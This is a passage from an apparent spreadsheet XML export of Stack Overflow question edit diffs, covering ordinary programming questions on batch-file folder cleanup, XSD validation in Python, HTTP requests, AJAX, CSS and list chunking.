 &lt;p&gt; I need to write a batch file which resides inside &lt;span class="diff-add"&gt;"FolderA". It&lt;/span&gt; should delete all the folders under &lt;span class="diff-add"&gt;"FolderA"&lt;/span&gt; as a cleanup activity. I don't know the folder names. &lt;code&gt;&lt;span class="diff-add"&gt;rmdir&lt;/span&gt;&lt;/code&gt; does not support wild cards.&lt;/p&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;Could&lt;/span&gt; someone provide a solution for this small problem?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Gulzar Nazim</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I have an XML file and an XML schema in another file and I'd like to validate that my XML file adheres to the schema. How do I do this in Python?&lt;/p&gt; _x000D_
 &lt;p&gt; I'd prefer something using the standard library, but I can install a third-party package if necessary.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; EDIT: I'm specifically talking about validating using XSD files, not DTD files.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I have an XML file and an XML schema in another file and I'd like to validate that my XML file adheres to the schema. How do I do this in Python?&lt;/p&gt; _x000D_
 &lt;p&gt; I'd prefer something using the standard library, but I can install a third-party package if necessary.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Eli Courtwright</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; There's a web services I want to call in my application, I can use it with importing the WSDL or by just use "HTTP GET" with the URL and parameters, so I prefer the later because it's simple thing.&lt;/p&gt; _x000D_
 &lt;p&gt; I know I can use indy idhttp.get, to do the job, but this is very simple thing and I don't want to add complex indy code to my application.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;UPDATE&lt;/strong&gt;: sorry if I was not clear, I meant by "not to add complex indy code", that I don't want add indy components for just this simple task, and prefer more lighter way for that.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; What I do is this&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;var HTML: string;_x000D_
//this http get authenticates user 123 on myplatform_x000D_
HTML := GetUrlContent('http://wwww.myplatform.com/login?login_id=123');_x000D_
// and i would like to display Result in a Delphi form_x000D_
//Display the recieved HTML in a form_x000D_
OpenHTMLinaform(HTML);_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; There's a web services I want to call in my application, I can use it with importing the WSDL or by just use "HTTP GET" with the URL and parameters, so I prefer the later because it's simple thing.&lt;/p&gt; _x000D_
 &lt;p&gt; I know I can use indy idhttp.get, to do the job, but this is very simple thing and I don't want to add complex indy code to my application.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;UPDATE&lt;/strong&gt;: sorry if I was not clear, I meant by "not to add complex indy code", that I don't want add indy components for just this simple task, and prefer more lighter way for that.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Sahil Mahajan Mj</t>
  </si>
  <si>
    <t>LaBracca</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'm trying to test the functionality of a web app by scripting a login sequence in Python, but I'm having some troubles.&lt;/p&gt; _x000D_
 &lt;p&gt; Here's what I need to do:&lt;/p&gt; _x000D_
 &lt;ol&gt; _x000D_
  &lt;li&gt; Do a POST with a few parameters and headers.&lt;/li&gt; _x000D_
  &lt;li&gt; Follow a redirect&lt;/li&gt; _x000D_
  &lt;li&gt; Retrieve the HTML body.&lt;/li&gt; _x000D_
 &lt;/ol&gt; _x000D_
 &lt;p&gt; Now, I'm relatively new to python, but the two things I've tested so far haven't worked. First I used httplib, with putrequest() (passing the parameters within the URL), and putheader(). This didn't seem to follow the redirects.&lt;/p&gt; _x000D_
 &lt;p&gt; Then I tried urllib and urllib2, passing both headers and parameters as dicts. This seems to return the login page, instead of the page I'm trying to login to, I guess it's because of lack of cookies or something.&lt;/p&gt; _x000D_
 &lt;p&gt; Am I missing something simple?&lt;/p&gt; _x000D_
 &lt;p&gt; Thanks.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;Edit: Can I assume from the answers given that there is no &lt;/span&gt;&lt;strong&gt;&lt;span class="diff-delete"&gt;native&lt;/span&gt;&lt;/strong&gt;&lt;span class="diff-delete"&gt; way of doing this in Python?&lt;/span&gt;&lt;/em&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'm trying to test the functionality of a web app by scripting a login sequence in Python, but I'm having some troubles.&lt;/p&gt; _x000D_
 &lt;p&gt; Here's what I need to do:&lt;/p&gt; _x000D_
 &lt;ol&gt; _x000D_
  &lt;li&gt; Do a POST with a few parameters and headers.&lt;/li&gt; _x000D_
  &lt;li&gt; Follow a redirect&lt;/li&gt; _x000D_
  &lt;li&gt; Retrieve the HTML body.&lt;/li&gt; _x000D_
 &lt;/ol&gt; _x000D_
 &lt;p&gt; Now, I'm relatively new to python, but the two things I've tested so far haven't worked. First I used httplib, with putrequest() (passing the parameters within the URL), and putheader(). This didn't seem to follow the redirects.&lt;/p&gt; _x000D_
 &lt;p&gt; Then I tried urllib and urllib2, passing both headers and parameters as dicts. This seems to return the login page, instead of the page I'm trying to login to, I guess it's because of lack of cookies or something.&lt;/p&gt; _x000D_
 &lt;p&gt; Am I missing something simple?&lt;/p&gt; _x000D_
 &lt;p&gt; Thanks.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Ace</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Web parts seem to be used extensively in Sharepoint related development, but examples of using them in asp.net webforms applications are few and far between. I'm implementing a domain specific portal framework and like the "widgetlike" functionality in iGoogle or &lt;span class="diff-delete"&gt;Pageflakes&lt;/span&gt; and would like to get that kind of feature in my application. The real troubling issue from my perspective is that the drag &amp;amp; drop layout features of web parts do not work in non-IE browsers unless you use the latest ASP.NET AJAX futures library. It seems to me if Microsoft meant this to be a foundation technology, they would have moved these features into the main product by now.&lt;/p&gt; _x000D_
 &lt;p&gt; Are web parts a dead-end technology? If so, are there any alternatives?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Web parts seem to be used extensively in Sharepoint related development, but examples of using them in asp.net webforms applications are few and far between. I'm implementing a domain specific portal framework and like the "widgetlike" functionality in iGoogle or &lt;span class="diff-add"&gt;pageflakes&lt;/span&gt; and would like to get that kind of feature in my application. The real troubling issue from my perspective is that the drag &amp;amp; drop layout features of web parts do not work in non-IE browsers unless you use the latest ASP.NET AJAX futures library. It seems to me if Microsoft meant this to be a foundation technology, they would have moved these features into the main product by now.&lt;/p&gt; _x000D_
 &lt;p&gt; Are web parts a dead-end technology? If so, are there any alternatives?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>briangraf</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;&lt;span class="diff-delete"&gt;Exact duplicate of &lt;/span&gt;&lt;a href="http://stackoverflow.com/questions/203456/how-can-i-get-the-icon-from-the-executable-file-only-having-an-instance-of-its"&gt;&lt;span class="diff-delete"&gt;How can I get the icon from the executable file only having an instance of it's Process in C#&lt;/span&gt;&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt; Having the window handle for an open application, I'm able to use the GetWindowText function to retrieve the text from the title bar of the app. I would like to take this a step farther and retrieve the icon associated with the same app.&lt;/p&gt; _x000D_
 &lt;p&gt; How might I go about doing this? I looked through what I thought would be the relevant Win32 API sections, but nothing jumped out at me.&lt;/p&gt; _x000D_
 &lt;p&gt; Any pointers would be appreciated.&lt;/p&gt; _x000D_
 &lt;p&gt; Thanks in advance!&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Having the window handle for an open application, I'm able to use the GetWindowText function to retrieve the text from the title bar of the app. I would like to take this a step farther and retrieve the icon associated with the same app.&lt;/p&gt; _x000D_
 &lt;p&gt; How might I go about doing this? I looked through what I thought would be the relevant Win32 API sections, but nothing jumped out at me.&lt;/p&gt; _x000D_
 &lt;p&gt; Any pointers would be appreciated.&lt;/p&gt; _x000D_
 &lt;p&gt; Thanks in advance!&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I am using this HTML&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&amp;lt;html&amp;gt;_x000D_
    &amp;lt;head&amp;gt;_x000D_
        &amp;lt;Title&amp;gt;EBAY Search&amp;lt;/title&amp;gt;_x000D_
    &amp;lt;/head&amp;gt;_x000D_
    &amp;lt;script language="JavaScript" src="ajaxlib.js"&amp;gt;&amp;lt;/script&amp;gt;_x000D_
    &amp;lt;body&amp;gt;_x000D_
        Click here &amp;lt;a href="#" OnClick="GetEmployee()"&amp;gt;link&amp;lt;/a&amp;gt; to show content_x000D_
        &amp;lt;div id="Result"&amp;gt;&amp;lt;The result will be fetched here&amp;gt;&amp;lt;/div&amp;gt;_x000D_
    &amp;lt;/body&amp;gt;_x000D_
&amp;lt;/html&amp;gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; With this &lt;span class="diff-delete"&gt;JavaScript&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;var xmlHttp_x000D_
 _x000D_
function GetEmployee()_x000D_
 _x000D_
{_x000D_
 _x000D_
xmlHttp=GetXmlHttpObject()_x000D_
 _x000D_
if(xmlHttp==null)_x000D_
 _x000D_
{_x000D_
 _x000D_
alert("Your browser is not supported")_x000D_
 _x000D_
}_x000D_
 _x000D_
var url="get_employee.php"_x000D_
 _x000D_
url=url+"cmd=GetEmployee"_x000D_
 _x000D_
url=url+"&amp;amp;sid="+Math.random()_x000D_
 _x000D_
xmlHttp.open("GET",url,true)_x000D_
 _x000D_
xmlHttp.send(null)_x000D_
 _x000D_
}_x000D_
 _x000D_
function FetchComplete()_x000D_
 _x000D_
{_x000D_
 _x000D_
if(xmlHttp.readyState==4 || xmlHttp.readyState=="complete")_x000D_
 _x000D_
{_x000D_
 _x000D_
document.getElementById("Result").innerHTML=xmlHttp.responseText_x000D_
 _x000D_
}_x000D_
 _x000D_
if(xmlHttp.readyState==1 || xmlHttp.readyState=="loading")_x000D_
 _x000D_
{_x000D_
 _x000D_
document.getElementById("Result").innerHTML="loading"_x000D_
 _x000D_
}_x000D_
 _x000D_
}_x000D_
 _x000D_
function GetXmlHttpObject()_x000D_
 _x000D_
{_x000D_
 _x000D_
var xmlHttp=null;_x000D_
 _x000D_
try_x000D_
 _x000D_
{_x000D_
 _x000D_
xmlHttp=new XMLHttpRequest();_x000D_
 _x000D_
}_x000D_
 _x000D_
catch (e)_x000D_
 _x000D_
{_x000D_
 _x000D_
try_x000D_
 _x000D_
{_x000D_
 _x000D_
xmlHttp =new ActiveXObject("Microsoft.XMLHTTP");_x000D_
 _x000D_
}_x000D_
 _x000D_
}_x000D_
 _x000D_
return xmlHttp;_x000D_
 _x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; However it is not being called. get_employee.php works fine when I call it by itself, so that is not the problem. Is there anything wrong in my code that would prevent it from being called? I cannot test with any firefox extensions, I do not have access, so please don't give that as an answer.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I am using this HTML&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&amp;lt;html&amp;gt;_x000D_
    &amp;lt;head&amp;gt;_x000D_
        &amp;lt;Title&amp;gt;EBAY Search&amp;lt;/title&amp;gt;_x000D_
    &amp;lt;/head&amp;gt;_x000D_
    &amp;lt;script language="JavaScript" src="ajaxlib.js"&amp;gt;&amp;lt;/script&amp;gt;_x000D_
    &amp;lt;body&amp;gt;_x000D_
        Click here &amp;lt;a href="#" OnClick="GetEmployee()"&amp;gt;link&amp;lt;/a&amp;gt; to show content_x000D_
        &amp;lt;div id="Result"&amp;gt;&amp;lt;The result will be fetched here&amp;gt;&amp;lt;/div&amp;gt;_x000D_
    &amp;lt;/body&amp;gt;_x000D_
&amp;lt;/html&amp;gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; With this &lt;span class="diff-add"&gt;Javascript&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;var xmlHttp_x000D_
 _x000D_
function GetEmployee()_x000D_
 _x000D_
{_x000D_
 _x000D_
xmlHttp=GetXmlHttpObject()_x000D_
 _x000D_
if(xmlHttp==null)_x000D_
 _x000D_
{_x000D_
 _x000D_
alert("Your browser is not supported")_x000D_
 _x000D_
}_x000D_
 _x000D_
var url="get_employee.php"_x000D_
 _x000D_
url=url+"cmd=GetEmployee"_x000D_
 _x000D_
url=url+"&amp;amp;sid="+Math.random()_x000D_
 _x000D_
xmlHttp.open("GET",url,true)_x000D_
 _x000D_
xmlHttp.send(null)_x000D_
 _x000D_
}_x000D_
 _x000D_
function FetchComplete()_x000D_
 _x000D_
{_x000D_
 _x000D_
if(xmlHttp.readyState==4 || xmlHttp.readyState=="complete")_x000D_
 _x000D_
{_x000D_
 _x000D_
document.getElementById("Result").innerHTML=xmlHttp.responseText_x000D_
 _x000D_
}_x000D_
 _x000D_
if(xmlHttp.readyState==1 || xmlHttp.readyState=="loading")_x000D_
 _x000D_
{_x000D_
 _x000D_
document.getElementById("Result").innerHTML="loading"_x000D_
 _x000D_
}_x000D_
 _x000D_
}_x000D_
 _x000D_
function GetXmlHttpObject()_x000D_
 _x000D_
{_x000D_
 _x000D_
var xmlHttp=null;_x000D_
 _x000D_
try_x000D_
 _x000D_
{_x000D_
 _x000D_
xmlHttp=new XMLHttpRequest();_x000D_
 _x000D_
}_x000D_
 _x000D_
catch (e)_x000D_
 _x000D_
{_x000D_
 _x000D_
try_x000D_
 _x000D_
{_x000D_
 _x000D_
xmlHttp =new ActiveXObject("Microsoft.XMLHTTP");_x000D_
 _x000D_
}_x000D_
 _x000D_
}_x000D_
 _x000D_
return xmlHttp;_x000D_
 _x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; However it is not being called. get_employee.php works fine when I call it by itself, so that is not the problem. Is there anything wrong in my code that would prevent it from being called? I cannot test with any firefox extensions, I do not have access, so please don't give that as an answer&lt;span class="diff-add"&gt;.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; edit: the problem is the javascript is not being called at all. I fixed the question mark problem, but even just a simple javascript with an alert is not being called&lt;/span&gt;.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>user1253538</t>
  </si>
  <si>
    <t>Ken</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; SOLVED: Nevermind, the links were visited, and the border definition was missing for visited links (as someone pointed out, thanks). As for the color being first place in the border definition, the snippet comes from the IE Developper Toolbar, this is not directly my code. Anyway, thank you guys !&lt;/p&gt; _x000D_
 &lt;p&gt; Why does the link in the following snippet does not render underlined with a dashed line, just as expected and as ff would do ?&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&amp;lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML Strict//EN"&amp;gt;&amp;lt;META http-equiv="Content-Type" content="text/html; charset=iso-8859-1"&amp;gt;_x000D_
_x000D_
&amp;lt;HTML xmlns="http://www.w3.org/1999/xhtml"&amp;gt;_x000D_
&amp;lt;HEAD&amp;gt;&amp;lt;STYLE&amp;gt;_x000D_
/* Rule 1 of css/style.css */&lt;span class="diff-delete"&gt; _x000D_
&lt;/span&gt;_x000D_
* {&lt;span class="diff-delete"&gt;_x000D_
&amp;nbsp;&lt;/span&gt;_x000D_
    PADDING-RIGHT: 0px;&lt;span class="diff-delete"&gt;_x000D_
&amp;nbsp;&lt;/span&gt;_x000D_
    PADDING-LEFT: 0px;&lt;span class="diff-delete"&gt;_x000D_
&amp;nbsp;&lt;/span&gt;_x000D_
    PADDING-BOTTOM: 0px;&lt;span class="diff-delete"&gt;_x000D_
&amp;nbsp;&lt;/span&gt;_x000D_
    MARGIN: 0px;&lt;span class="diff-delete"&gt;_x000D_
&amp;nbsp;&lt;/span&gt;_x000D_
    PADDING-TOP: 0px;&lt;span class="diff-delete"&gt;_x000D_
&amp;nbsp;&lt;/span&gt;_x000D_
    FONT-FAMILY: "trebuchet ms", Arial, Helvetica, sans-serif&lt;span class="diff-delete"&gt;_x000D_
&amp;nbsp;&lt;/span&gt;_x000D_
}&lt;span class="diff-delete"&gt;_x000D_
_x000D_
&amp;nbsp;&lt;/span&gt;_x000D_
_x000D_
/* Rule 26 of css/style.css */ &lt;span class="diff-delete"&gt;_x000D_
&amp;nbsp;&lt;/span&gt;_x000D_
#main {&lt;span class="diff-delete"&gt;_x000D_
&amp;nbsp;&lt;/span&gt;_x000D_
    PADDING-RIGHT: 15px;&lt;span class="diff-delete"&gt;_x000D_
&amp;nbsp;&lt;/span&gt;_x000D_
    PADDING-LEFT: 15px;&lt;span class="diff-delete"&gt;_x000D_
&amp;nbsp;&lt;/span&gt;_x000D_
    PADDING-BOTTOM: 15px;&lt;span class="diff-delete"&gt;_x000D_
&amp;nbsp;&lt;/span&gt;_x000D_
    PADDING-TOP: 15px&lt;span class="diff-delete"&gt;_x000D_
&amp;nbsp;&lt;/span&gt;_x000D_
}&lt;span class="diff-delete"&gt;_x000D_
_x000D_
&amp;nbsp;&lt;/span&gt;_x000D_
_x000D_
/* Rule 12 of css/style.css */ &lt;span class="diff-delete"&gt;_x000D_
&amp;nbsp;&lt;/span&gt;_x000D_
#page {&lt;span class="diff-delete"&gt;_x000D_
&amp;nbsp;&lt;/span&gt;_x000D_
    BORDER-RIGHT: #555 1px solid;&lt;span class="diff-delete"&gt;_x000D_
&amp;nbsp;&lt;/span&gt;_x000D_
    PADDING-RIGHT: 0px;&lt;span class="diff-delete"&gt;_x000D_
&amp;nbsp;&lt;/span&gt;_x000D_
    BORDER-TOP: #555 1px solid;&lt;span class="diff-delete"&gt;_x000D_
&amp;nbsp;&lt;/span&gt;_x000D_
    PADDING-LEFT: 0px;&lt;span class="diff-delete"&gt;_x000D_
&amp;nbsp;&lt;/span&gt;_x000D_
    BACKGROUND: #fff;&lt;span class="diff-delete"&gt;_x000D_
&amp;nbsp;&lt;/span&gt;_x000D_
    PADDING-BOTTOM: 0px;&lt;span class="diff-delete"&gt;_x000D_
&amp;nbsp;&lt;/span&gt;_x000D_
    MARGIN: 50px auto;&lt;span class="diff-delete"&gt;_x000D_
&amp;nbsp;&lt;/span&gt;_x000D_
    BORDER-LEFT: #555 1px solid;&lt;span class="diff-delete"&gt;_x000D_
&amp;nbsp;&lt;/span&gt;_x000D_
    WIDTH: 752px;&lt;span class="diff-delete"&gt;_x000D_
&amp;nbsp;&lt;/span&gt;_x000D_
    PADDING-TOP: 0px;&lt;span class="diff-delete"&gt;_x000D_
&amp;nbsp;&lt;/span&gt;_x000D_
    BORDER-BOTTOM: #555 1px solid&lt;span class="diff-delete"&gt;_x000D_
&amp;nbsp;&lt;/span&gt;_x000D_
}&lt;span class="diff-delete"&gt;_x000D_
_x000D_
&amp;nbsp;&lt;/span&gt;_x000D_
_x000D_
/* Rule 2 of css/style.css */ &lt;span class="diff-delete"&gt;_x000D_
&amp;nbsp;&lt;/span&gt;_x000D_
BODY {&lt;span class="diff-delete"&gt;_x000D_
&amp;nbsp;&lt;/span&gt;_x000D_
    BACKGROUND: url(bg.gif) #ebeeff repeat-y center 50%&lt;span class="diff-delete"&gt;_x000D_
&amp;nbsp;&lt;/span&gt;_x000D_
}&lt;span class="diff-delete"&gt;_x000D_
_x000D_
&amp;nbsp;&lt;/span&gt;_x000D_
_x000D_
/* Rule 35 of css/style.css */ &lt;span class="diff-delete"&gt;_x000D_
&amp;nbsp;&lt;/span&gt;_x000D_
#main A:link {&lt;span class="diff-delete"&gt;_x000D_
&amp;nbsp;&lt;/span&gt;_x000D_
    COLOR: #437fda;&lt;span class="diff-delete"&gt;_x000D_
&amp;nbsp;&lt;/span&gt;_x000D_
    BORDER-BOTTOM: #437fda 1px dashed;&lt;span class="diff-delete"&gt;_x000D_
&amp;nbsp;&lt;/span&gt;_x000D_
    TEXT-DECORATION: none&lt;span class="diff-delete"&gt;_x000D_
&amp;nbsp;&lt;/span&gt;_x000D_
}&lt;span class="diff-delete"&gt;_x000D_
&amp;nbsp;&lt;/span&gt;_x000D_
_x000D_
&amp;lt;/STYLE&amp;gt;&amp;lt;/HEAD&amp;gt;_x000D_
&amp;lt;BODY&amp;gt;&amp;lt;DIV id="page"&amp;gt;&amp;lt;DIV id="main"&amp;gt;&amp;lt;TABLE&amp;gt;&amp;lt;TBODY&amp;gt;&amp;lt;TR&amp;gt;&amp;lt;TD&amp;gt;&lt;span class="diff-delete"&gt;_x000D_
&amp;nbsp;&lt;/span&gt;_x000D_
&amp;lt;A href="http://www.immo-brasseurs.com/coords.php?num=37"&amp;gt;Test link &amp;lt;/A&amp;gt;&lt;span class="diff-delete"&gt;_x000D_
&amp;nbsp;&lt;/span&gt;_x000D_
&amp;lt;/TD&amp;gt;&amp;lt;/TR&amp;gt;&amp;lt;/TBODY&amp;gt;&amp;lt;/TABLE&amp;gt;&amp;lt;/DIV&amp;gt;&amp;lt;/DIV&amp;gt;&amp;lt;/BODY&amp;gt;&amp;lt;/HTML&amp;gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; SOLVED: Nevermind, the links were visited, and the border definition was missing for visited links (as someone pointed out, thanks). As for the color being first place in the border definition, the snippet comes from the IE Developper Toolbar, this is not directly my code. Anyway, thank you guys !&lt;/p&gt; _x000D_
 &lt;p&gt; Why does the link in the following snippet does not render underlined with a dashed line, just as expected and as ff would do ?&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&amp;lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML Strict//EN"&amp;gt;&amp;lt;META http-equiv="Content-Type" content="text/html; charset=iso-8859-1"&amp;gt;_x000D_
_x000D_
&amp;lt;HTML xmlns="http://www.w3.org/1999/xhtml"&amp;gt;_x000D_
&amp;lt;HEAD&amp;gt;&amp;lt;STYLE&amp;gt;&lt;span class="diff-add"&gt;&amp;nbsp;_x000D_
&lt;/span&gt;_x000D_
/* Rule 1 of css/style.css */_x000D_
* {_x000D_
    PADDING-RIGHT: 0px;_x000D_
    PADDING-LEFT: 0px;_x000D_
    PADDING-BOTTOM: 0px;_x000D_
    MARGIN: 0px;_x000D_
    PADDING-TOP: 0px;_x000D_
    FONT-FAMILY: "trebuchet ms", Arial, Helvetica, sans-serif_x000D_
}_x000D_
_x000D_
/* Rule 26 of css/style.css */ _x000D_
#main {_x000D_
    PADDING-RIGHT: 15px;_x000D_
    PADDING-LEFT: 15px;_x000D_
    PADDING-BOTTOM: 15px;_x000D_
    PADDING-TOP: 15px_x000D_
}_x000D_
_x000D_
/* Rule 12 of css/style.css */ _x000D_
#page {_x000D_
    BORDER-RIGHT: #555 1px solid;_x000D_
    PADDING-RIGHT: 0px;_x000D_
    BORDER-TOP: #555 1px solid;_x000D_
    PADDING-LEFT: 0px;_x000D_
    BACKGROUND: #fff;_x000D_
    PADDING-BOTTOM: 0px;_x000D_
    MARGIN: 50px auto;_x000D_
    BORDER-LEFT: #555 1px solid;_x000D_
    WIDTH: 752px;_x000D_
    PADDING-TOP: 0px;_x000D_
    BORDER-BOTTOM: #555 1px solid_x000D_
}_x000D_
_x000D_
/* Rule 2 of css/style.css */ _x000D_
BODY {_x000D_
    BACKGROUND: url(bg.gif) #ebeeff repeat-y center 50%_x000D_
}_x000D_
_x000D_
/* Rule 35 of css/style.css */ _x000D_
#main A:link {_x000D_
    COLOR: #437fda;_x000D_
    BORDER-BOTTOM: #437fda 1px dashed;_x000D_
    TEXT-DECORATION: none_x000D_
}_x000D_
_x000D_
&amp;lt;/STYLE&amp;gt;&amp;lt;/HEAD&amp;gt;_x000D_
&amp;lt;BODY&amp;gt;&amp;lt;DIV id="page"&amp;gt;&amp;lt;DIV id="main"&amp;gt;&amp;lt;TABLE&amp;gt;&amp;lt;TBODY&amp;gt;&amp;lt;TR&amp;gt;&amp;lt;TD&amp;gt;_x000D_
&amp;lt;A href="http://www.immo-brasseurs.com/coords.php?num=37"&amp;gt;Test link &amp;lt;/A&amp;gt;_x000D_
&amp;lt;/TD&amp;gt;&amp;lt;/TR&amp;gt;&amp;lt;/TBODY&amp;gt;&amp;lt;/TABLE&amp;gt;&amp;lt;/DIV&amp;gt;&amp;lt;/DIV&amp;gt;&amp;lt;/BODY&amp;gt;&amp;lt;/HTML&amp;gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Harley Holcombe</t>
  </si>
  <si>
    <t>RaGE</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; How can I prevent the pocket PC device &lt;span class="diff-delete"&gt;to shutdown&lt;/span&gt; from my application when the power button pressed? I am using C#.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; How can I prevent the pocket PC device &lt;span class="diff-add"&gt;from shutting down&lt;/span&gt; from my application when the power button pressed? I am using C#.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; What design considerations must be taken when writing software for content-distribution systems?&lt;/p&gt; _x000D_
 &lt;p&gt; I am also looking for examples of open source CDN (content delivery network) software. I can think of two projects, &lt;a href="http://www.coralcdn.org/" rel="nofollow noreferrer"&gt;CoralCDN&lt;/a&gt; and &lt;a href="http://labtel.ing.uniroma1.it/opencdn/" rel="nofollow noreferrer"&gt;OpenCDN&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; Please note that there is more to a CDN than just hardware bandwidth. A CDN is a combination of software &lt;em&gt;and&lt;/em&gt; hardware. Please try and understand the big picture, otherwise keep your comments to yourself.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; What design considerations must be taken when writing software for content-distribution systems&lt;span class="diff-add"&gt;, such as managing the synchronisation and distribution of data, redirecting downloads to the nearest servers and so on&lt;/span&gt;?&lt;/p&gt; _x000D_
 &lt;p&gt; I am also looking for examples of open source CDN (content delivery network) software. I can think of two projects, &lt;a href="http://www.coralcdn.org/" rel="nofollow noreferrer"&gt;CoralCDN&lt;/a&gt; and &lt;a href="http://labtel.ing.uniroma1.it/opencdn/" rel="nofollow noreferrer"&gt;OpenCDN&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; Please note that there is more to a CDN than just hardware bandwidth. A CDN is a combination of software &lt;em&gt;and&lt;/em&gt; hardware. Please try and understand the big picture, otherwise keep your comments to yourself.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>dbr</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I have a list of arbitrary length, and I need to split it up into equal size chunks and operate on it. There are some obvious ways to do this, like keeping a counter and two lists, and when the second list fills up, add it to the first list and empty the second list for the next round of data, but this is potentially extremely expensive.&lt;span class="diff-delete"&gt;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lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; I was wondering if anyone had a good solution to this for lists of any length, e.g. using generators.&lt;/p&gt; _x000D_
 &lt;p&gt; I was looking for something useful in &lt;code&gt;itertools&lt;/code&gt; but I couldn't find anything obviously useful. Might've missed it, though.&lt;/p&gt; _x000D_
 &lt;p&gt; Related question: &lt;a href="http://stackoverflow.com/questions/434287/what-is-the-most-pythonic-way-to-iterate-over-a-list-in-chunks"&gt;What is the most â€œpythonicâ€? way to iterate over a list in chunks?&lt;/a&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
